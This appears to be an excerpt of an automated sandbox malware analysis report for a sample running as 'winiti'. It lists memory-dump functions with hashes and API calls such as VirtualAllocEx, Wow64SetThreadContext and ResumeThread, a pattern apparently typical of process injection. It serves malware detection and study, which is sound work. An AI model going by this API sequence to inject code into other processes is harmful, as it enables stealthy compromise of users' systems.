                      control_flow_graph 1185 1e838aa-1e83978 ReadProcessMemory 1188 1e8397a-1e83980 1185->1188 1189 1e83981-1e839d3 1185->1189 1188->1189
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01E83962
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 88e1e21c1b96c79a62b05876d64075321d6b065b5b8ef0fe2a99f6f76d3bed51
                      • Instruction ID: c073c56653e6d684538ca37422e3da808ae455edcf5979cd9ebfadea70385fbf
                      • Opcode Fuzzy Hash: 88e1e21c1b96c79a62b05876d64075321d6b065b5b8ef0fe2a99f6f76d3bed51
                      • Instruction Fuzzy Hash: B441AAB5D042589FCF10CFA9D884AEEFBB1BF49314F14A42AE815B7204D335A946CF64
                      Function 01E838B0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1194 1e838b0-1e83978 ReadProcessMemory 1197 1e8397a-1e83980 1194->1197 1198 1e83981-1e839d3 1194->1198 1197->1198
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01E83962
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 1a5e7bc28809f676642effa2ad31e17ae5a2ac102f07d2e597d6ffb7bb8bf4cf
                      • Instruction ID: 59e13006dcd08a63c10d29dbd98e72e52cc4fbb4178775541da85bb54238c9a4
                      • Opcode Fuzzy Hash: 1a5e7bc28809f676642effa2ad31e17ae5a2ac102f07d2e597d6ffb7bb8bf4cf
                      • Instruction Fuzzy Hash: 2A41B9B5D002589FCF10CFA9D884AEEFBB1BB49310F14A42AE818B7204D734A945CF64
                      Function 01E83622 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1203 1e83622-1e836e8 VirtualAllocEx 1207 1e836ea-1e836f0 1203->1207 1208 1e836f1-1e8373b 1203->1208 1207->1208
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01E836D2
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: c856aece577fe03127a0946b940125a77b982b01f4a482c70ada333e4ae07b70
                      • Instruction ID: 227bfb493a2abf7ac77d5d7a07f316e242b190119a9eb1741ece8ea6f2756111
                      • Opcode Fuzzy Hash: c856aece577fe03127a0946b940125a77b982b01f4a482c70ada333e4ae07b70
                      • Instruction Fuzzy Hash: B241AAB9D002589FCF10CFA9D980AEEFBB1BB49314F10A42AE819B7300D735A906CF55
                      Function 01E83628 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1213 1e83628-1e836e8 VirtualAllocEx 1216 1e836ea-1e836f0 1213->1216 1217 1e836f1-1e8373b 1213->1217 1216->1217
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01E836D2
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 3c9fc044f5320b8b7aa7c3fd688d74a216c663c350757977ff1cf632d3cca11f
                      • Instruction ID: 565082b36a9a90778667cbaed7c59eac804549fb193607163c781139c466ae40
                      • Opcode Fuzzy Hash: 3c9fc044f5320b8b7aa7c3fd688d74a216c663c350757977ff1cf632d3cca11f
                      • Instruction Fuzzy Hash: E741A9B8D002489FCF10CFA9D980AEEFBB1BB49314F10A42AE814B7300D735A905CF65
                      Function 01E834F6 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                      Download Yara Rule
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 01E835A7
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: a5a7c5955785f6a59898f260024ddc5a8b161c2f93d1e3036dcbb5e1c3b599f7
                      • Instruction ID: 207ba571ade76fb2af4790ee4b616ea09497eee6e4b69d905a87d1526d2d25ca
                      • Opcode Fuzzy Hash: a5a7c5955785f6a59898f260024ddc5a8b161c2f93d1e3036dcbb5e1c3b599f7
                      • Instruction Fuzzy Hash: 9341BCB4D002589FCB10DFA9D884AEEFFB1BF49314F24902AE419B7244D7389A45CF64
                      Function 01E834F8 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                      Download Yara Rule
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 01E835A7
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 0495bf901c32766b118df7eafd5eff324f0a72e5ef67931bc154b028b7846edc
                      • Instruction ID: f8516073d7a2285a3dcdeda3e4f04619fe1ee03eaafb7e20a402e4db83181b72
                      • Opcode Fuzzy Hash: 0495bf901c32766b118df7eafd5eff324f0a72e5ef67931bc154b028b7846edc
                      • Instruction Fuzzy Hash: 4E41ADB5D002589FCB10DFA9D984AEEFBB1BB49314F24942AE418B7244D738AA45CF64
                      Function 01E83406 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON
                      Download Yara Rule
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 01E83486
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 4d2c1e9c133c9b78c7db246d568ecc8fb1e985eba2c3087641aa7f5f46d8e050
                      • Instruction ID: f360f8f891065a88d8a4b6d30df19f0f95efac1cce206acda54438f84f980259
                      • Opcode Fuzzy Hash: 4d2c1e9c133c9b78c7db246d568ecc8fb1e985eba2c3087641aa7f5f46d8e050
                      • Instruction Fuzzy Hash: 5A31AAB4D002589FCF14CFA9D984AEEFBB1AF49314F14946AE819B7300C735A905CF94
                      Function 01E83408 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                      Download Yara Rule
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 01E83486
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 1472cbcb8a8c148cb466e9b9e2ded8c72da0dd5c9fc19a4ae39bcd0d9788c053
                      • Instruction ID: d653946a91e6c58c24df50c702585e576eea4f8e1d64e879fec0e9a41d0cbbd4
                      • Opcode Fuzzy Hash: 1472cbcb8a8c148cb466e9b9e2ded8c72da0dd5c9fc19a4ae39bcd0d9788c053
                      • Instruction Fuzzy Hash: 4231B9B4D002189FCF14CFA9D984AAEFBB5BB49324F14942AE818B7300C735A905CFA4
                      Function 0043F4F8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID: r
                      • API String ID: 0-1812594589
                      • Opcode ID: 433b5c661179fcb291254561dd8410b7ff630989ad18e8b3b899d684a0d1fc34
                      • Instruction ID: 06d7288923419a0f32b0d471b4e60361e844d7da9cadf5f79568ac0e2e6e7067
                      • Opcode Fuzzy Hash: 433b5c661179fcb291254561dd8410b7ff630989ad18e8b3b899d684a0d1fc34
                      • Instruction Fuzzy Hash: 8451FA74D05208DBCB08CFA9D4449EDB7BAFF4D301F20E166D41AA7262C738994ADF59
                      Function 004332A8 Relevance: .2, Instructions: 207COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ebbc4b5ffb87e123fcb03d2af3391bd903a5c47b2870a228a9912f7b7cdf4336
                      • Instruction ID: db67261612a14a1869fdbb71a10b7f2c29f4dc4b8b4e940b6683d9a94a9d1f84
                      • Opcode Fuzzy Hash: ebbc4b5ffb87e123fcb03d2af3391bd903a5c47b2870a228a9912f7b7cdf4336
                      • Instruction Fuzzy Hash: 35812E307006049FD705AF78D859AAEB7E6EBC9305F54C92DE40A8B355DF38A9068B91
                      Function 00438C7A Relevance: .2, Instructions: 153COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b1f7fb49135eb5929303121187f9afffc286b6b6a99aaf7fdb0e5dd72acbbf48
                      • Instruction ID: 5434a4219d4ce5bf8f7626f10eaca6adc641da2985e9bb089ce3395924f6af47
                      • Opcode Fuzzy Hash: b1f7fb49135eb5929303121187f9afffc286b6b6a99aaf7fdb0e5dd72acbbf48
                      • Instruction Fuzzy Hash: 13512774D49609CFCB00CFA8D4808EEFBB4BB1D340F20645BE856E7355DB7898529B69
                      Function 00438C88 Relevance: .1, Instructions: 148COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 34c6bad1a0d5ff6491789487243e415f92b332fab5d8bd6c1c74885611a916fe
                      • Instruction ID: c054eecc8caa9e602a26dfb84be029f478801e7a14dc0ec2961558b44f6687dd
                      • Opcode Fuzzy Hash: 34c6bad1a0d5ff6491789487243e415f92b332fab5d8bd6c1c74885611a916fe
                      • Instruction Fuzzy Hash: 00511A74D09609DFCB00CFA9D4808EEFBB4BB1D340F20645BE856E7355DB7898129B69
                      Function 00439801 Relevance: .1, Instructions: 131COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 260669da61990ecaff9bbdb60d62591fb1ede13a15276f9382915934f38ac2f3
                      • Instruction ID: 86add356b5cb9f98f519d3da8ed4dc1ede0c0427a78ba1ddde6f007bd27e2031
                      • Opcode Fuzzy Hash: 260669da61990ecaff9bbdb60d62591fb1ede13a15276f9382915934f38ac2f3
                      • Instruction Fuzzy Hash: C741F574D19258CFCB18DFA5D884AEDBBB5EF4E310F206016E40AA7291C7789D42DF18
                      Function 00438B3A Relevance: .1, Instructions: 120COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 38b5e9a46754b0d201bac2b17d2673f7ff95fc12fd8c047f04f7f70fc50758b1
                      • Instruction ID: ebae83b41aa86f77b77ec463c09c94aef8bb4b2c9e2c80012c12a5446b1de49a
                      • Opcode Fuzzy Hash: 38b5e9a46754b0d201bac2b17d2673f7ff95fc12fd8c047f04f7f70fc50758b1
                      • Instruction Fuzzy Hash: 77415CB0909619CFC704CF5AD8849BDFBB8BF4E300F21B49AE0599B226DB349855DB09
                      Function 00438B48 Relevance: .1, Instructions: 114COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f9910c57442af562768f1bb6b33942274886c36274d36439d531801803af571c
                      • Instruction ID: bb79e4189b185b4a10eb45a136193fe92c0b6bc17adf99949ddd3d9d0e24cbb9
                      • Opcode Fuzzy Hash: f9910c57442af562768f1bb6b33942274886c36274d36439d531801803af571c
                      • Instruction Fuzzy Hash: 93415EB0909619CFD704CF5AD8849BDF7F8BF4D300F11B49AE0599B226DB34A815DB19
                      Function 0043AB70 Relevance: .1, Instructions: 107COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bef86fcea80b3d3c2f542ee436df4f9e815fd5334c5eb51767f47ce0e191c73e
                      • Instruction ID: 0ad5f71d8a9150c06290be5cfdc1351dd905486f83a7b33328fe15314887cb56
                      • Opcode Fuzzy Hash: bef86fcea80b3d3c2f542ee436df4f9e815fd5334c5eb51767f47ce0e191c73e
                      • Instruction Fuzzy Hash: 8741C030A001088FDB44EFA8D895BEF7BB6FB89314F208069E555E7389CB385D05CBA1
                      Function 0043AB80 Relevance: .1, Instructions: 98COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cdb8af764fc9e9bc33099a514f3f37c633346574e217e0a6e55d63f1bd0efe8a
                      • Instruction ID: 3b7624ff7478ae6a1609bde6e5600455edb925e4511f0639262ac03573c23322
                      • Opcode Fuzzy Hash: cdb8af764fc9e9bc33099a514f3f37c633346574e217e0a6e55d63f1bd0efe8a
                      • Instruction Fuzzy Hash: 31318D31E001089FDB44EFA8D885BEFB7B6FB88314F208029E555A7389DB385D11CBA1
                      Function 000CD01C Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.441337548.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_cd000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 015e569f3a384883c7fb76126a6e151b9a263a08964763cda96ede1ceaf42569
                      • Instruction ID: 041c0128832446db70e1f4170462a0def3906079d10e29e3c6ebd9682cdbdff2
                      • Opcode Fuzzy Hash: 015e569f3a384883c7fb76126a6e151b9a263a08964763cda96ede1ceaf42569
                      • Instruction Fuzzy Hash: A821AF75604240AFDB25CF18D884F2ABBA5EB84314F34C5BEE84A4B256C336D847CBA1
                      Function 000CD1D4 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.441337548.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_cd000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e20a0300da9148944f2d64fe9c7e0b479bf44945b8b6d0c70e09af0bd1cc01e2
                      • Instruction ID: 54b16f061ac72567c20b382fadaedde181f52c1c04bb47ea66623a84ac7b47ea
                      • Opcode Fuzzy Hash: e20a0300da9148944f2d64fe9c7e0b479bf44945b8b6d0c70e09af0bd1cc01e2
                      • Instruction Fuzzy Hash: 9021F2B1604240EFDB11CF14D9C0F2ABBA1FB94314F24C5BEE8494B286C336D846CB61
                      Function 0043B2D8 Relevance: .1, Instructions: 67COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6fc4ad339cda230191156350fb541b1f7435b6784c1b13f9e9313982446418c4
                      • Instruction ID: a7d81a7af8aafec3e839781bf1f3e614d679513a2d2130addcec3068037d5607
                      • Opcode Fuzzy Hash: 6fc4ad339cda230191156350fb541b1f7435b6784c1b13f9e9313982446418c4
                      • Instruction Fuzzy Hash: 5221A5307453449FC7059B69C819B5E7BA6EF87310F29C0EBD6058F2A6DB389D05C786
                      Function 000CD006 Relevance: .1, Instructions: 63COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.441337548.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_cd000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 64006da6675ded6e2369e997191632a39f6ac3f2cf3087ae85bd410ca571b034
                      • Instruction ID: d56428a14c0c1d39917f081c30c8200f7a934c9829ca166f4aa8e46accf59457
                      • Opcode Fuzzy Hash: 64006da6675ded6e2369e997191632a39f6ac3f2cf3087ae85bd410ca571b034
                      • Instruction Fuzzy Hash: 742150755083809FDB12CF14D994B15BFB1EB46314F28C5EBD8498F267C33A985ACB62
                      Function 0043E588 Relevance: .1, Instructions: 59COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d52e5f3378a38b339b85dc81bf182721e2bab6cd7cfdfce28cd3e87083ba74b5
                      • Instruction ID: c0ed509993dbb3659bc34bb3a9f0fd63fe87b4e28e8d549d53b5c2715b81b1f5
                      • Opcode Fuzzy Hash: d52e5f3378a38b339b85dc81bf182721e2bab6cd7cfdfce28cd3e87083ba74b5
                      • Instruction Fuzzy Hash: D421C7B4D05109DFCB44CF9AC5809AEBBF5EB4C304F60A056D809A7355D734AA41DF91
                      Function 0043B2B0 Relevance: .1, Instructions: 55COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2371dccb9de3bfe4f21d4dd44e0263d0628e95e9d78c3dcd89dde8e7a9d4a54c
                      • Instruction ID: 4f2200c4ff15a2e41b358766191391ecfb2cc4365ab99153255e0a1f7455ecff
                      • Opcode Fuzzy Hash: 2371dccb9de3bfe4f21d4dd44e0263d0628e95e9d78c3dcd89dde8e7a9d4a54c
                      • Instruction Fuzzy Hash: 761170306497C08FD3069B249859B5A7F61AF87310F29C1EBD6458F2E7CB689C06CB86
                      Function 004393C2 Relevance: .1, Instructions: 54COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 08587238c0313d3072c782cf582c0e8a8214f2d269ea74a4abee950038a8031e
                      • Instruction ID: 2e8a5a5985d8407f1abed56ab426cda1e0256754147c1a5aebb9006f0023eca4
                      • Opcode Fuzzy Hash: 08587238c0313d3072c782cf582c0e8a8214f2d269ea74a4abee950038a8031e
                      • Instruction Fuzzy Hash: AC110A74D09644CBDB08CF65C4447BEBBB5AF4E300F14E06AC4691B392D7B4484ADB86
                      Function 000CD1CF Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.441337548.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_cd000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                      • Instruction ID: 37b1aca266e81225712db09446aa3a2dc6665751eefd52451e9758758b0808ee
                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                      • Instruction Fuzzy Hash: E8119D75904280DFDB52CF14D9C4B19FFA1FB94314F28C6AED8494B696C33AD84ACBA1
                      Function 00439348 Relevance: .0, Instructions: 49COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e514c8e4e7a64eb6fe64ab5bffc34defc63a1f8f0e7d0b79399209ca4e220f78
                      • Instruction ID: e39526834d7f27eaa437642045af43d038aa6c5c101eddd3747f9c26d05910b2
                      • Opcode Fuzzy Hash: e514c8e4e7a64eb6fe64ab5bffc34defc63a1f8f0e7d0b79399209ca4e220f78
                      • Instruction Fuzzy Hash: ED11A570D09784CBD709CB65C4147AEBBB5AF8E300F04A067C4595B292C7B84945CB95
                      Function 00439358 Relevance: .0, Instructions: 43COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1a59a854338874c46d40cc58a42a63196cbdcae9803c8b2deb3cc6b571ef2b5e
                      • Instruction ID: 13bdfa557a8fdfcfd2a8f83a6bdb29b19bfcced0638da5c91ccd191e5c1ea69b
                      • Opcode Fuzzy Hash: 1a59a854338874c46d40cc58a42a63196cbdcae9803c8b2deb3cc6b571ef2b5e
                      • Instruction Fuzzy Hash: 5A017171D09204DBDB08CF66C4047AEB7B9AB8D300F14E026881967341D7B84945DF85
                      Function 0043F948 Relevance: .0, Instructions: 39COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 34a6dfbb997c39168f934f800cf40d096fa15e9cfe1890e5935bd961a8329996
                      • Instruction ID: b40f22dc89de9e0a153f10e59bab920037d8958a5c9096117df6124f90eeaf43
                      • Opcode Fuzzy Hash: 34a6dfbb997c39168f934f800cf40d096fa15e9cfe1890e5935bd961a8329996
                      • Instruction Fuzzy Hash: 9001E874A04208EFC704DFA8C995BADBBF5AF4D300F2590A5D5089B365D730DE05EB41
                      Function 00430918 Relevance: .0, Instructions: 35COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5e21afb8091975b7adc223f503400e0c95af3acbca658bd7efb07cde60e1acbe
                      • Instruction ID: 96ca968c6277dba736b72bdd0578832e98dd511665362d493edab5b8a1911c01
                      • Opcode Fuzzy Hash: 5e21afb8091975b7adc223f503400e0c95af3acbca658bd7efb07cde60e1acbe
                      • Instruction Fuzzy Hash: BBF0B47480A2889FD706CB759975BADBF709F4B300F1912EFD48993163D6380E04CB15
                      Function 00430839 Relevance: .0, Instructions: 33COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ba7bca392330f6980c3259d5c96bd77542d38fa456d7849fa7e2094ff38ee5fa
                      • Instruction ID: 301eed367af0ef371b4895f6795dae8cdb234d13dc6c88c681345345ae31e351
                      • Opcode Fuzzy Hash: ba7bca392330f6980c3259d5c96bd77542d38fa456d7849fa7e2094ff38ee5fa
                      • Instruction Fuzzy Hash: E9F0E57094210C9FEB04EFB4DC23B6E77B59B42300F0129AED00693182CE389E04D688
                      Function 00430848 Relevance: .0, Instructions: 26COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 87232cb1724cdc245858eaa8f45d2a0d667bba3bf5d4f8695deb3a012bc70eb0
                      • Instruction ID: ec1be16bcb30c09ddcb7e5c96449a90e9dd4faaf86c95bb8a975ccfcc8f8f84d
                      • Opcode Fuzzy Hash: 87232cb1724cdc245858eaa8f45d2a0d667bba3bf5d4f8695deb3a012bc70eb0
                      • Instruction Fuzzy Hash: 82E0D83050110C9BDB14EBB4D822A2E72B4DB41300F4029ADD40653240CE355E00D644
                      Function 00430484 Relevance: .0, Instructions: 25COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1530fbfba2f81754537b701cfa515a06bef367ad79019ac7b79c1d4664ed3faf
                      • Instruction ID: 34489ef372138b055a8ec8ba685e307427ab9eda248c453868cfcfc52e37a9bd
                      • Opcode Fuzzy Hash: 1530fbfba2f81754537b701cfa515a06bef367ad79019ac7b79c1d4664ed3faf
                      • Instruction Fuzzy Hash: 35E0487094210CEBD754DF59D561B6EB7B5EF49300F9021EEE00863221DB385E00D659
                      Function 00434DA0 Relevance: .0, Instructions: 25COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
